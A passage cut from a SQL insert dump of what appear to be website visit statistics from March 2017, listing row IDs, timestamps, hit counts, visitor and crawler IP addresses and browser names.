69.178','other'),(93482,1489582623,1,1,0,0,'51.255.65.58','other'),(93483,1489582657,1,1,0,0,'94.179.47.28','chrome'),(93484,1489583176,1,0,1,0,'66.249.66.210',''),(93485,1489583826,1,1,0,0,'91.196.177.94','firefox'),(93486,1489584064,1,1,0,0,'94.179.45.251','firefox'),(93487,1489584798,1,1,0,0,'91.196.178.69','firefox'),(93488,1489585142,1,1,0,0,'91.196.178.70','firefox'),(93489,1489585349,1,0,1,0,'66.249.76.111',''),(93490,1489585453,1,1,0,0,'51.255.65.68','other'),(93491,1489585468,1,1,0,0,'141.0.12.72','other'),(93492,1489585761,1,1,0,0,'141.0.12.72','opera'),(93493,1489585860,1,1,0,0,'163.172.64.186','other'),(93494,1489586504,2,2,0,0,'46.201.242.237','firefox'),(93495,1489586887,1,1,0,0,'94.178.146.185','chrome'),(93496,1489586899,1,1,0,0,'212.68.169.158','firefox'),(93497,1489587098,1,1,0,0,'51.255.65.62','other'),(93498,1489587112,1,1,0,0,'91.196.178.103','chrome'),(93499,1489587185,1,0,1,0,'68.180.229.99',''),(93500,1489588141,1,1,0,0,'141.8.142.67','other'),(93501,1489588189,1,0,1,0,'66.249.66.202',''),(93502,1489588383,1,0,1,0,'66.249.76.29',''),(93503,1489588463,1,1,0,0,'180.76.15.12','other'),(93504,1489588908,1,0,1,0,'207.46.13.233',''),(93505,1489589369,1,1,0,0,'141.0.12.72','opera'),(93506,1489590038,1,1,0,0,'141.8.142.67','other'),(93507,1489590122,1,1,0,0,'130.193.51.19','other'),(93508,1489590207,1,1,0,0,'91.196.177.46','other'),(93509,1489590531,1,1,0,0,'178.93.42.38','chrome'),(93510,1489590544,1,1,0,0,'91.196.178.132','chrome'),(93511,1489590823,1,1,0,0,'51.255.65.12','other'),(93512,1489591324,1,1,0,0,'51.255.65.13','other'),(93513,1489591411,1,1,0,0,'91.196.178.161','chrome'),(93514,1489591757,1,1,0,0,'141.8.142.58','other'),(93515,1489591796,1,1,0,0,'2.76.230.131','chrome'),(93516,1489591858,1,1,0,0,'77.41.43.97','msie'),(93517,1489592090,1,1,0,0,'164.132.161.47','other'),(93518,1489592823,1,1,0,0,'141.0.12.72','opera'),(93519,1489593984,2,2,0,0,'141.8.142.175','other'),(93520,1489593987,1,1,0,0,'141.8.142.61','other'),(93521,1489593995,1,1,0,0,'141.8.183.25','other'),(93522,1489593999,1,1,0,0,'130.193.51.19','other'),(93523,1489594007,1,1,0,0,'164.132.161.42','other'),(93524,1489594221,1,0,1,0,'157.55.39.2',''),(93525,1489594268,1,1,0,0,'164.132.161.36','other'),(93526,1489595326,1,1,0,0,'180.76.15.9','other'),(93527,1489595711,1,1,0,0,'94.158.89.62','chrome'),(93528,1489595713,1,1,0,0,'163.172.64.224','other'),(93529,1489597393,1,0,1,0,'157.55.39.21',''),(93530,1489597760,1,1,0,0,'163.172.64.246','other'),(93531,1489597774,1,1,0,0,'51.255.65.95','other'),(93532,1489597840,1,1,0,0,'164.132.161.94','other'),(93533,1489597939,1,1,0,0,'94.179.12.28','chrome'),(93534,1489598293,1,1,0,0,'51.255.65.31','other'),(93535,1489598926,1,1,0,0,'51.255.65.81','other'),(93536,1489599077,1,1,0,0,'164.132.161.57','other'),(93537,1489599099,1,0,1,0,'66.249.66.188',''),(93538,1489599529,1,1,0,0,'164.132.161.38','other'),(93539,1489600058,1,0,1,0,'66.249.66.185',''),(93540,1489600256,1,0,1,0,'66.249.66.182',''),(93541,1489600333,2,0,2,0,'66.249.66.202',''),(93542,1489600360,1,1,0,0,'164.132.161.66','other'),(93543,1489600533,1,1,0,0,'51.255.65.45','other'),(93544,1489601386,1,1,0,0,'52.86.176.3','other'),(93545,1489601460,1,1,0,0,'141.8.183.25','other'),(93546,1489602108,1,0,1,0,'66.249.66.188',''),(93547,1489602915,1,1,0,0,'164.132.161.87','other'),(93548,1489603173,1,1,0,0,'95.108.179.22','other'),(93549,1489603418,2,2,0,0,'91.196.178.40','chrome'),(93550,1489603973,12,0,12,0,'68.180.229.99',''),(93551,1489604843,1,1,0,0,'51.255.65.57','other'),(93552,1489605035,1,0,1,0,'66.249.66.202',''),(93553,1489605107,1,0,1,0,'66.249.66.185',''),(93554,1489605312,1,1,0,0,'141.0.12.18','other'),(93555,1489607390,1,1,0,0,'164.132.161.70','other'),(93556,1489607450,1,1,0,0,'163.172.64.229','other'),(93557,1489607623,1,1,0,0,'52.86.176.3','other'),(93558,1489607922,1,0,1,0,'66.249.66.182',''),(93559,1489609377,1,1,0,0,'66.249.66.197','chrome'),(93560,1489609895,1,1,0,0,'164.132.161.49','other'),(93561,1489609995,1,1,0,0,'185.26.180.78','opera'),(93562,1489610363,1,1,0,0,'164.132.161.31','other'),(93563,1489610459,1,0,1,0,'207.46.13.233',''),(93564,1489611566,1,1,0,0,'185.26.180.78','opera'),(93565,1489611678,1,0,1,0,'66.249.66.210',''),(93566,1489611871,1,1,0,0,'164.132.161.82','other'),(93567,1489612838,1,0,1,0,'157.55.39.2',''),(93568,1489612873,1,1,0,0,'141.8.142.58','other'),(93569,1489613365,1,1,0,0,'163.172.68.123','other'),(93570,1489613576,1,1,0,0,'51.255.65.64','other'),(93571,1489614021,1,1,0,0,'163.172.64.232','other'),(93572,1489614602,1,1,0,0,'130.193.51.19','other'),(93573,1489614622,1,0,1,0,'207.46.13.233',''),(93574,1489614646,1,1,0,0,'163.172.64.239','other'),(93575,1489614653,1,1,0,0,'91.209.11.236','other'),(93576,1489615438,1,1,0,0,'163.172.71.29','other'),(93577,1489618115,1,1,0,0,'91.196.178.168','chrome'),(93578,1489618495,1,0,1,0,'66.249.66.188',''),(93579,1489618635,1,0,1,0,'68.180.229.99',''),(93580,1489619228,1,1,0,0,'51.255.65.49','other'),(93581,1489619483,1,0,1,0,'66.249.66.210',''),(93582,1489620744,1,1,0,0,'51.255.65.60','other'),(93583,1489620777,1,1,0,0,'95.108.179.18','other'),(93584,1489621019,1,1,0,0,'164.132.161.72','other'),(93585,1489623305,1,1,0,0,'94.180.151.157','msie'),(93586,1489623668,12,12,0,0,'88.198.23.179','other'),(93587,1489623749,1,1,0,0,'51.255.65.9','other'),(93588,1489623869,1,0,1,0,'66.249.66.210',''),(93589,1489623912,1,1,0,0,'163.172.64.233','other'),(93590,1489624303,1,1,0,0,'141.8.142.61','other'),(93591,1489625491,1,1,0,0,'46.48.13.161','chrome'),(93592,1489625722,1,1,0,0,'188.32.103.121','msie'),(93593,1489625950,1,1,0,0,'66.249.66.180','chrome'),(93594,1489626011,1,1,0,0,'130.193.50.4','other'),(93595,1489626035,1,1,0,0,'130.193.51.19','other'),(93596,1489626957,1,0,1,0,'157.55.39.114',''),(93597,1489627726,1,1,0,0,'157.55.39.168','other'),(93598,1489628481,1,1,0,0,'51.255.65.80','other'),(93599,1489628914,1,1,0,0,'164.132.161.70','other'),(93600,1489629409,1,1,0,0,'66.249.66.183','chrome'),(93601,1489629541,1,1,0,0,'51.255.65.25','other'),(93602,1489629689,1,1,0,0,'176.195.114.179','msie'),(93603,1489630124,2,2,0,0,'141.8.142.61','other'),(93604,1489630131,1,1,0,0,'141.8.142.58','other'),(93605,1489630205,1,1,0,0,'141.8.132.30','other'),(93606,1489630209,2,2,0,0,'95.108.179.22','other'),(93607,1489630246,1,0,1,0,'66.249.66.180',''),(93608,1489630612,1,1,0,0,'176.15.237.212','msie'),(93609,1489630921,1,1,0,0,'207.46.13.95','other'),(93610,1489631596,1,0,1,0,'66.249.66.81',''),(93611,1489632076,1,0,1,0,'207.46.13.233',''),(93612,1489632376,1,0,1,0,'40.77.167.85',''),(93613,1489632784,1,1,0,0,'141.8.142.61','other'),(93614,1489632996,1,1,0,0,'51.255.65.5','other'),(93615,1489633299,1,1,0,0,'51.255.65.95','other'),(93616,1489633669,1,1,0,0,'164.132.161.64','other'),(93617,1489633827,1,0,1,0,'157.55.39.114',''),(93618,1489634226,1,1,0,0,'51.255.65.61','other'),(93619,1489634880,1,1,0,0,'164.132.161.15','other'),(93620,1489635741,1,1,0,0,'91.196.178.40','chrome'),(93621,1489636853,1,1,0,0,'164.132.161.34','other'),(93622,1489637374,2,0,2,0,'66.249.66.180',''),(93623,1489637844,1,0,1,0,'66.249.66.183',''),(93624,1489637905,1,1,0,0,'207.46.13.95','other'),(93625,1489638439,1,1,0,0,'163.172.64.254','other'),(93626,1489639330,1,1,0,0,'95.108.179.22','other'),(93627,1489639404,1,1,0,0,'141.8.142.175','other'),(93628,1489640049,1,0,1,0,'207.46.13.95',''),(93629,1489640303,1,1,0,0,'164.132.161.72','other'),(93630,1489640817,1,0,1,0,'66.249.66.81',''),(93631,1489641086,1,0,1,0,'66.249.66.84',''),(93632,1489642752,1,1,0,0,'91.196.178.71','firefox'),(93633,1489642792,1,0,1,0,'66.249.66.84',''),(93634,1489643724,1,1,0,0,'91.196.178.70','firefox'),(93635,1489644322,1,1,0,0,'207.46.13.233','other'),(93636,1489644324,1,0,1,0,'66.249.66.81',''),(93637,1489644405,1,1,0,0,'66.249.93.157','chrome'),(93638,1489644547,1,0,1,0,'66.249.66.180',''),(93639,1489644723,1,1,0,0,'51.255.65.57','other'),(93640,1489645241,2,2,0,0,'91.196.178.70','firefox'),(93641,1489645408,1,1,0,0,'80.64.173.162','other'),(93642,1489645479,1,1,0,0,'207.46.13.233','other'),(93643,1489645798,1,1,0,0,'164.132.161.31','other'),(93644,1489646333,1,1,0,0,'193.194.127.217','firefox'),(93645,1489647343,1,0,1,0,'207.46.13.95',''),(93646,1489647398,1,1,0,0,'91.196.178.70','firefox'),(93647,1489647830,1,1,0,0,'51.255.65.15','other'),(93648,1489648232,1,1,0,0,'91.196.178.161','chrome'),(93649,1489648776,1,1,0,0,'164.132.161.89','other'),(93650,1489649428,1,1,0,0,'180.76.15.20','other'),(93651,1489649485,1,1,0,0,'82.145.221.127','chrome'),(93652,1489650201,1,1,0,0,'136.243.131.220','chrome'),(93653,1489650364,1,1,0,0,'91.196.177.26','chrome'),(93654,1489650477,1,1,0,0,'82.207.71.218','chrome'),(93655,1489650715,1,0,1,0,'207.46.13.233',''),(93656,1489650990,1,1,0,0,'51.255.65.69','other'),(93657,1489651085,1,1,0,0,'91.196.178.133','firefox'),(93658,1489651478,1,0,1,0,'66.249.66.177',''),(93659,1489651518,3,3,0,0,'80.64.173.162','other'),(93660,1489652003,1,1,0,0,'141.8.183.25','other'),(93661,1489652516,1,1,0,0,'91.196.177.26','chrome'),(93662,1489652603,1,1,0,0,'66.249.93.205','chrome'),(93663,1489652616,1,0,1,0,'66.249.66.177',''),(93664,1489652646,1,1,0,0,'130.193.50.4','other'),(93665,1489652650,1,1,0,0,'141.8.142.175','other'),(93666,1489652718,1,1,0,0,'141.8.142.67','other'),(93667,1489652721,1,1,0,0,'93.158.152.61','other'),(93668,1489652915,1,1,0,0,'91.196.178.70','chrome'),(93669,1489652931,1,1,0,0,'91.196.178.69','firefox'),(93670,1489653881,1,1,0,0,'91.196.179.134','chrome'),(93671,1489654160,1,1,0,0,'46.48.13.161','chrome'),(93672,1489654543,1,1,0,0,'92.112.195.217','chrome'),(93673,1489654774,1,1,0,0,'178.92.62.197','chrome'),(93674,1489654949,1,1,0,0,'91.196.178.70','firefox'),(93675,1489655034,1,0,1,0,'66.249.66.81',''),(93676,1489655081,1,1,0,0,'91.196.178.70','chrome'),(93677,1489655602,1,0,1,0,'66.249.66.84',''),(93678,1489656209,1,0,1,0,'66.249.66.183',''),(93679,1489656213,1,1,0,0,'95.134.203.12','chrome'),(93680,1489656228,1,0,1,0,'66.249.66.177',''),(93681,1489656968,1,1,0,0,'91.196.179.134','chrome'),(93682,1489657027,1,1,0,0,'164.132.161.44','other'),(93683,1489657088,161,161,0,0,'88.198.55.175','other'),(93684,1489657791,1,1,0,0,'91.196.177.46','firefox'),(93685,1489658924,1,1,0,0,'91.196.178.161','chrome'),(93686,1489659020,1,1,0,0,'46.164.130.92','firefox'),(93687,1489659047,1,1,0,0,'141.8.142.175','other'),(93688,1489659051,1,1,0,0,'95.108.179.22','other'),(93689,1489659068,1,0,1,0,'207.46.13.95',''),(93690,1489659382,1,1,0,0,'46.201.242.237','firefox'),(93691,1489659639,1,1,0,0,'164.132.161.21','other'),(93692,1489660766,3,3,0,0,'46.201.242.237','firefox'),(93693,1489660914,1,0,1,0,'66.249.66.87',''),(93694,1489661104,1,0,1,0,'66.249.66.84',''),(93695,1489661254,1,1,0,0,'91.196.178.161','chrome'),(93696,1489662478,1,0,1,0,'66.249.66.180',''),(93697,1489662564,1,1,0,0,'46.201.242.237','firefox'),(93698,1489662587,1,1,0,0,'91.196.178.70','other'),(93699,1489662636,1,1,0,0,'37.73.186.225','chrome'),(93700,1489662832,1,0,1,0,'66.249.66.84',''),(93701,1489663022,1,1,0,0,'91.196.178.161','chrome'),(93702,1489663856,1,1,0,0,'51.255.65.58','other'),(93703,1489664390,1,1,0,0,'163.172.68.132','other'),(93704,1489664427,2,2,0,0,'46.201.242.237','firefox'),(93705,1489664939,1,0,1,0,'66.249.66.177',''),(93706,1489665015,1,1,0,0,'51.255.65.76','other'),(93707,1489665255,1,1,0,0,'51.255.65.89','other'),(93708,1489665667,2,2,0,0,'95.108.179.22','other'),(93709,1489665685,1,1,0,0,'91.196.178.68','chrome'),(93710,1489665897,1,1,0,0,'94.153.192.46','chrome'),(93711,1489665975,2,2,0,0,'141.8.183.25','other'),(93712,1489666206,1,1,0,0,'46.201.242.237','firefox'),(93713,1489666331,1,1,0,0,'68.64.160.14','chrome'),(93714,1489667257,2,2,0,0,'46.201.242.237','firefox'),(93715,1489667502,1,1,0,0,'130.180.219.16','firefox'),(93716,1489667622,1,1,0,0,'91.196.178.71','chrome'),(93717,1489667884,1,1,0,0,'46.201.39.155','chrome'),(93718,1489668177,1,1,0,0,'163.172.64.222','other'),(93719,1489668487,3,3,0,0,'46.201.242.237','firefox'),(93720,1489668679,1,1,0,0,'163.172.69.178','other'),(93721,1489668792,1,1,0,0,'164.132.161.13','other'),(93722,1489669861,1,1,0,0,'51.255.65.38','other'),(93723,1489670070,1,1,0,0,'51.255.65.48','other'),(93724,1489670227,1,1,0,0,'176.115.98.3','chrome'),(93725,1489670630,1,0,1,0,'66.249.66.183',''),(93726,1489670735,1,1,0,0,'46.201.242.237','firefox'),(93727,1489671802,1,1,0,0,'46.201.242.237','firefox'),(93728,1489672082,1,1,0,0,'180.76.15.160','other'),(93729,1489672113,2,2,0,0,'141.0.12.113','other'),(93730,1489672203,1,1,0,0,'95.132.46.229','chrome'),(93731,1489672702,1,1,0,0,'66.249.66.180','chrome'),(93732,1489672707,1,1,0,0,'46.201.227.188','chrome'),(93733,1489672755,1,1,0,0,'91.196.178.68','firefox'),(93734,1489673063,1,1,0,0,'91.196.178.70','msie'),(93735,1489673346,1,1,0,0,'163.172.64.182','other'),(93736,1489673432,1,1,0,0,'91.196.178.164','chrome'),(93737,1489673814,1,1,0,0,'91.196.178.70','other'),(93738,1489674503,1,1,0,0,'130.193.51.19','other'),(93739,1489675435,4,4,0,0,'91.196.178.104','chrome'),(93740,1489676011,1,1,0,0,'91.196.178.161','chrome'),(93741,1489676123,1,0,1,0,'207.46.13.15',''),(93742,1489676549,1,1,0,0,'91.196.177.46','firefox'),(93743,1489676562,1,1,0,0,'95.132.75.11','firefox'),(93744,1489676654,1,1,0,0,'51.255.65.67','other'),(93745,1489677400,2,2,0,0,'37.54.103.65','chrome'),(93746,1489677491,1,1,0,0,'164.132.161.35','other'),(93747,1489677523,1,1,0,0,'82.207.120.68','chrome'),(93748,1489677970,1,1,0,0,'31.40.107.104','chrome'),(93749,1489678818,1,1,0,0,'207.46.13.15','other'),(93750,1489679288,2,2,0,0,'212.111.196.39','chrome'),(93751,1489679321,1,1,0,0,'195.69.135.42','msie'),(93752,1489679537,1,1,0,0,'95.135.90.80','chrome'),(93753,1489679615,1,1,0,0,'180.76.15.160','other'),(93754,1489680269,1,1,0,0,'51.255.65.46','other'),(93755,1489681190,1,1,0,0,'141.8.184.11','other'),(93756,1489681199,1,1,0,0,'141.8.132.10','other'),(93757,1489682162,1,1,0,0,'178.94.21.123','chrome'),(93758,1489682694,1,0,1,0,'66.249.76.109',''),(93759,1489683616,1,1,0,0,'163.172.64.185','other'),(93760,1489683623,1,1,0,0,'94.178.119.215','chrome'),(93761,1489684020,1,1,0,0,'51.255.65.78','other'),(93762,1489684330,3,3,0,0,'95.134.170.204','chrome'),(93763,1489684464,1,1,0,0,'164.132.161.72','other'),(93764,1489684853,18,18,0,0,'178.202.133.114','other'),(93765,1489685149,1,1,0,0,'91.196.178.66','chrome'),(93766,1489685213,1,1,0,0,'141.8.142.175','other'),(93767,1489685446,1,0,1,0,'66.249.66.81',''),(93768,1489685869,1,0,1,0,'66.249.76.108',''),(93769,1489686951,1,1,0,0,'51.255.65.32','other'),(93770,1489686993,2,2,0,0,'163.172.73.28','other'),(93771,1489687533,1,1,0,0,'91.196.178.66','firefox'),(93772,1489687659,1,1,0,0,'46.48.13.161','chrome'),(93773,1489688082,1,1,0,0,'178.154.189.37','other'),(93774,1489688206,1,1,0,0,'91.209.11.236','other'),(93775,1489688803,1,1,0,0,'5.255.253.68','other'),(93776,1489688806,1,1,0,0,'141.8.142.62','other'),(93777,1489688892,1,1,0,0,'130.193.50.6','other'),(93778,1489688896,1,1,0,0,'5.255.253.47','other'),(93779,1489688900,2,2,0,0,'5.255.253.67','other'),(93780,1489689735,1,1,0,0,'51.255.65.41','other'),(93781,1489690060,1,1,0,0,'51.255.65.18','other'),(93782,1489692072,1,1,0,0,'51.255.65.44','other'),(93783,1489693783,1,1,0,0,'130.180.211.248','chrome'),(93784,1489694023,1,1,0,0,'164.132.161.7','other'),(93785,1489694277,2,2,0,0,'95.132.59.114','chrome'),(93786,1489695141,2,2,0,0,'91.196.178.104','chrome'),(93787,1489695545,1,1,0,0,'51.255.65.3','other'),(93788,1489695647,1,1,0,0,'164.132.161.37','other'),(93789,1489696219,1,0,1,0,'68.180.230.114',''),(93790,1489696593,1,1,0,0,'95.108.179.22','other'),(93791,1489697236,1,1,0,0,'164.132.161.44','other'),(93792,1489697859,1,1,0,0,'51.255.65.14','other'),(93793,1489698272,1,1,0,0,'164.132.161.70','other'),(93794,1489698324,2,2,0,0,'91.196.178.104','chrome'),(93795,1489698380,1,1,0,0,'164.132.161.23','other'),(93796,1489698830,1,0,1,0,'40.77.167.69',''),(93797,1489698980,1,1,0,0,'91.196.178.133','chrome'),(93798,1489698985,1,1,0,0,'164.132.161.58','other'),(93799,1489699784,1,1,0,0,'163.172.69.178','other'),(93800,1489700252,1,1,0,0,'180.76.15.145','other'),(93801,1489700481,1,1,0,0,'163.172.64.243','other'),(93802,1489700509,1,1,0,0,'51.255.65.44','other'),(93803,1489701547,1,1,0,0,'51.255.65.63','other'),(93804,1489702251,1,1,0,0,'51.255.65.37','other'),(93805,1489702641,1,1,0,0,'51.255.65.23','other'),(93806,1489704323,1,1,0,0,'207.46.13.152','other'),(93807,1489704376,1,1,0,0,'52.86.176.3','other'),(93808,1489704603,1,1,0,0,'163.172.64.238','other'),(93809,1489704857,1,0,1,0,'66.249.66.177',''),(93810,1489705295,1,0,1,0,'66.249.76.28',''),(93811,1489705315,1,0,1,0,'207.46.13.152',''),(93812,1489705776,1,1,0,0,'40.77.167.7','other'),(93813,1489705943,1,1,0,0,'95.108.179.22','other'),(93814,1489705945,1,1,0,0,'51.255.65.13','other'),(93815,1489707599,1,1,0,0,'164.132.161.77','other'),(93816,1489707905,1,1,0,0,'163.172.64.230','other'),(93817,1489708892,1,0,1,0,'40.77.167.31',''),(93818,1489709640,1,0,1,0,'157.55.39.8',''),(93819,1489710256,1,0,1,0,'66.249.76.107',''),(93820,1489710605,1,1,0,0,'51.255.65.44','other'),(93821,1489710692,1,1,0,0,'130.193.51.19','other'),(93822,1489710739,1,1,0,0,'164.132.161.48','other'),(93823,1489710769,1,1,0,0,'66.249.76.107','chrome'),(93824,1489710832,49,2,47,0,'198.204.253.58',''),(93825,1489711067,1,1,0,0,'207.46.13.152','other'),(93826,1489711369,2,1,1,0,'198.204.253.58',''),(93827,1489711372,167,1,166,0,'198.204.253.58',''),(93828,1489712142,1,1,0,0,'163.172.64.220','other'),(93829,1489712278,37,0,37,0,'198.204.253.58',''),(93830,1489712442,3,2,1,0,'198.204.253.58',''),(93831,1489712460,2,1,1,0,'198.204.253.58',''),(93832,1489712476,2,1,1,0,'198.204.253.58',''),(93833,1489712486,2,1,1,0,'198.204.253.58',''),(93834,1489712491,3,2,1,0,'198.204.253.58',''),(93835,1489712511,3,1,2,0,'198.204.253.58',''),(93836,1489712526,4,2,2,0,'198.204.253.58',''),(93837,1489712551,3,2,1,0,'198.204.253.58',''),(93838,1489712565,2,1,1,0,'198.204.253.58',''),(93839,1489712578,3,2,1,0,'198.204.253.58',''),(93840,1489712586,2,1,1,0,'198.204.253.58',''),(93841,1489712591,6,5,1,0,'198.204.253.58',''),(93842,1489712610,3,1,2,0,'198.204.253.58',''),(93843,1489712619,2,1,1,0,'198.204.253.58',''),(93844,1489712637,2,1,1,0,'198.204.253.58',''),(93845,1489712649,2,1,1,0,'198.204.253.58',''),(93846,1489712654,3,1,2,0,'198.204.253.58',''),(93847,1489712663,2,1,1,0,'198.204.253.58',''),(93848,1489712673,2,1,1,0,'198.204.253.58',''),(93849,1489712682,2,1,1,0,'198.204.253.58',''),(93850,1489712693,3,1,2,0,'198.204.253.58',''),(93851,1489712701,4,2,2,0,'198.204.253.58',''),(93852,1489712712,3,2,1,0,'198.204.253.58',''),(93853,1489712730,2,1,1,0,'198.204.253.58',''),(93854,1489712739,4,2,2,0,'198.204.253.58',''),(93855,1489712753,2,1,1,0,'198.204.253.58',''),(93856,1489712763,10,7,3,0,'198.204.253.58',''),(93857,1489712809,2,1,1,0,'198.204.253.58',''),(93858,1489712819,96,96,0,0,'198.204.253.58','msie'),(93859,1489712895,10,10,0,0,'198.204.253.58','firefox'),(93860,1489713729,1,1,0,0,'95.108.179.18','other'),(93861,1489714005,1,1,0,0,'141.8.142.58','other'),(93862,1489715307,1,0,1,0,'40.77.167.69',''),(93863,1489716913,1,1,0,0,'164.132.161.84','other'),(93864,1489717012,1,1,0,0,'66.249.76.109','chrome'),(93865,1489717144,1,0,1,0,'66.249.76.29',''),(93866,1489717152,1,1,0,0,'164.132.161.33','other'),(93867,1489717447,1,1,0,0,'66.249.76.108','chrome'),(93868,1489717828,1,1,0,0,'66.249.76.29','chrome'),(93869,1489718907,1,0,1,0,'66.249.76.28',''),(93870,1489718922,1,0,1,0,'66.249.66.177',''),(93871,1489719026,1,1,0,0,'66.249.76.108','chrome'),(93872,1489719139,1,1,0,0,'217.69.133.5','other'),(93873,1489719614,1,1,0,0,'66.249.66.183','chrome'),(93874,1489719873,2,2,0,0,'91.196.178.104','chrome'),(93875,1489720908,1,1,0,0,'207.46.13.40','other'),(93876,1489721975,1,1,0,0,'130.193.51.19','other'),(93877,1489722257,2,2,0,0,'91.196.178.104','chrome'),(93878,1489722859,1,1,0,0,'164.132.161.74','other'),(93879,1489723016,1,1,0,0,'51.255.65.14','other'),(93880,1489723450,1,1,0,0,'51.255.65.90','other'),(93881,1489723775,1,1,0,0,'164.132.161.21','other'),(93882,1489723822,1,1,0,0,'46.42.175.108','msie'),(93883,1489724425,1,0,1,0,'66.249.66.180',''),(93884,1489724547,1,0,1,0,'66.249.66.183',''),(93885,1489725425,2,0,2,0,'66.249.76.107',''),(93886,1489725723,1,0,1,0,'66.249.76.30',''),(93887,1489726462,2,0,2,0,'66.249.76.29',''),(93888,1489726766,1,1,0,0,'66.249.66.180','chrome'),(93889,1489726868,1,1,0,0,'141.8.132.30','other'),(93890,1489727807,1,1,0,0,'163.172.68.118','other'),(93891,1489728298,1,0,1,0,'66.249.76.29',''),(93892,1489728885,1,1,0,0,'91.196.178.70','firefox'),(93893,1489729524,1,1,0,0,'164.132.161.56','other'),(93894,1489731379,1,0,1,0,'66.249.76.28',''),(93895,1489731805,1,1,0,0,'91.196.178.70','firefox'),(93896,1489732430,1,1,0,0,'95.108.179.22','other'),(93897,1489732754,1,1,0,0,'91.196.178.70','firefox'),(93898,1489733228,1,1,0,0,'91.196.177.46','firefox'),(93899,1489733398,2,0,2,0,'66.249.76.28',''),(93900,1489733573,1,0,1,0,'207.46.13.40',''),(93901,1489733772,1,1,0,0,'37.52.17.207','chrome'),(93902,1489734052,1,1,0,0,'164.132.161.67','other'),(93903,1489734612,1,1,0,0,'91.196.179.33','firefox'),(93904,1489734745,1,1,0,0,'217.23.11.65','chrome'),(93905,1489734893,1,1,0,0,'66.249.93.157','chrome'),(93906,1489735101,1,1,0,0,'91.196.177.46','firefox'),(93907,1489735460,1,1,0,0,'163.172.64.189','other'),(93908,1489736240,1,1,0,0,'91.196.178.72','chrome'),(93909,1489736253,2,2,0,0,'141.8.183.25','other'),(93910,1489736542,1,1,0,0,'217.23.11.65','chrome'),(93911,1489737163,1,1,0,0,'164.132.161.80','other'),(93912,1489737634,1,0,1,0,'66.249.76.30',''),(93913,1489737922,1,1,0,0,'164.132.161.69','other'),(93914,1489738077,1,1,0,0,'78.111.185.217','chrome'),(93915,1489738225,1,1,0,0,'91.196.177.35','firefox'),(93916,1489738338,24,24,0,0,'92.156.245.74','other'),(93917,1489738343,1,1,0,0,'217.23.11.65','chrome'),(93918,1489738517,1,0,1,0,'66.249.76.108',''),(93919,1489738942,3,3,0,0,'46.164.130.92','firefox'),(93920,1489739057,2,2,0,0,'91.209.11.236','other'),(93921,1489739844,1,1,0,0,'46.164.130.92','firefox'),(93922,1489739977,1,1,0,0,'91.196.177.35','firefox'),(93923,1489740142,1,1,0,0,'217.23.11.65','chrome'),(93924,1489740790,1,1,0,0,'207.46.13.139','other'),(93925,1489741068,1,1,0,0,'51.255.65.94','other'),(93926,1489741944,1,1,0,0,'217.23.11.65','chrome'),(93927,1489742049,1,1,0,0,'83.170.203.142','chrome'),(93928,1489742497,1,1,0,0,'185.46.151.42','chrome'),(93929,1489742740,1,1,0,0,'163.172.71.21','other'),(93930,1489743322,1,1,0,0,'141.0.13.52','other'),(93931,1489743355,2,2,0,0,'91.200.12.15','msie'),(93932,1489743589,1,0,1,0,'66.249.66.180',''),(93933,1489743647,1,0,1,0,'66.249.76.30',''),(93934,1489743658,1,0,1,0,'66.249.76.28',''),(93935,1489743742,1,1,0,0,'217.23.11.65','chrome'),(93936,1489743872,8,8,0,0,'37.73.215.101','chrome'),(93937,1489744029,1,1,0,0,'46.201.242.237','firefox'),(93938,1489744080,1,1,0,0,'91.209.11.236','other'),(93939,1489744686,1,0,1,0,'66.249.66.177',''),(93940,1489745542,1,1,0,0,'217.23.11.65','chrome'),(93941,1489745684,1,1,0,0,'91.196.178.66','firefox'),(93942,1489745705,1,1,0,0,'46.201.242.237','firefox'),(93943,1489745729,5,5,0,0,'46.229.168.74','other'),(93944,1489745737,6,6,0,0,'46.229.168.70','other'),(93945,1489745751,4,4,0,0,'46.229.168.69','other'),(93946,1489745771,1,0,1,0,'66.249.66.84',''),(93947,1489745793,7,7,0,0,'46.229.168.65','other'),(93948,1489745842,1,1,0,0,'95.132.35.97','chrome'),(93949,1489745882,1,1,0,0,'91.209.11.236','other'),(93950,1489745900,3,3,0,0,'46.229.168.68','other'),(93951,1489745906,3,3,0,0,'46.229.168.72','other'),(93952,1489746218,1,1,0,0,'164.132.161.45','other'),(93953,1489746434,1,1,0,0,'51.255.65.38','other'),(93954,1489746951,1,1,0,0,'130.180.219.189','firefox'),(93955,1489746963,1,1,0,0,'8.29.198.36','other'),(93956,1489747030,1,1,0,0,'8.29.198.27','other'),(93957,1489747113,1,1,0,0,'66.249.93.158','chrome'),(93958,1489747709,1,1,0,0,'164.132.161.6','other'),(93959,1489747748,1,1,0,0,'91.209.11.236','other'),(93960,1489747994,1,1,0,0,'130.180.220.140','chrome'),(93961,1489748044,1,1,0,0,'91.196.178.165','chrome'),(93962,1489748085,1,1,0,0,'46.164.130.92','firefox'),(93963,1489748524,1,1,0,0,'91.196.178.33','firefox'),(93964,1489748870,1,1,0,0,'46.200.253.40','chrome'),(93965,1489748881,1,1,0,0,'5.255.253.68','other'),(93966,1489749502,1,1,0,0,'91.196.177.46','chrome'),(93967,1489749512,1,0,1,0,'66.249.66.84',''),(93968,1489749622,1,1,0,0,'91.196.178.66','firefox'),(93969,1489750229,1,1,0,0,'163.172.64.184','other'),(93970,1489750478,1,0,1,0,'66.249.66.87',''),(93971,1489750529,1,1,0,0,'46.201.242.237','firefox'),(93972,1489751651,1,1,0,0,'91.196.178.66','firefox'),(93973,1489751902,1,1,0,0,'51.255.65.30','other'),(93974,1489752211,1,1,0,0,'180.76.15.22','other'),(93975,1489752987,1,1,0,0,'51.255.65.30','other'),(93976,1489753221,1,1,0,0,'51.255.65.26','other'),(93977,1489753604,1,1,0,0,'46.200.244.55','opera'),(93978,1489753641,1,1,0,0,'51.255.65.27','other'),(93979,1489754079,1,0,1,0,'66.249.66.84',''),(93980,1489754196,1,1,0,0,'46.200.244.55','chrome'),(93981,1489754210,1,1,0,0,'95.108.179.22','other'),(93982,1489754493,1,1,0,0,'91.196.178.70','firefox'),(93983,1489754688,1,0,1,0,'66.249.66.183',''),(93984,1489754780,1,1,0,0,'91.196.178.66','firefox'),(93985,1489754910,1,0,1,0,'40.77.167.69',''),(93986,1489755148,1,1,0,0,'46.164.130.92','firefox'),(93987,1489755398,3,3,0,0,'95.108.179.22','other'),(93988,1489755411,1,1,0,0,'141.8.142.61','other'),(93989,1489755414,3,3,0,0,'141.8.142.175','other'),(93990,1489755417,1,1,0,0,'141.8.183.25','other'),(93991,1489755677,1,1,0,0,'91.196.178.70','firefox'),(93992,1489755776,1,1,0,0